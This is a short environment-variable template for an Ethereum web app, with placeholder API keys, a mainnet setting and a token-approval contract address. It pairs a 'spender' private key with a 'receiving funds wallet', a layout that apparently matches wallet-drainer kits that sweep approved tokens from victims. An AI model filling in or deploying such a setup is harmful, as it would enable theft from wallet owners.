ALCHEMY_API= == API KEY HERE ==
RPC_URL=https://rpc.ankr.com/eth
NEXT_PUBLIC_WALLETCONNECT_PROJECT_ID= == PROJECT ID HERE ==
NEXT_PUBLIC_INFURA_API_KEY= == API KEY HERE ==
NEXT_PUBLIC_ETHEREUM_NETWORK=homestead
NEXT_PUBLIC_INFURA_URL=https://mainnet.infura.io/v3/ ==API KEY HERE==
NEXT_PUBLIC_CONTRACT_ADDRESS=0x000000000022D473030F116dDEE9F6B43aC78BA3
NEXT_PUBLIC_MORALIS_API_KEY= == API KEY HERE ==
PRIVATE_KEYS_SPENDER= == PK RECEIVING FUNDS WALLET =
RECEIVING_FUNDS_WALLET=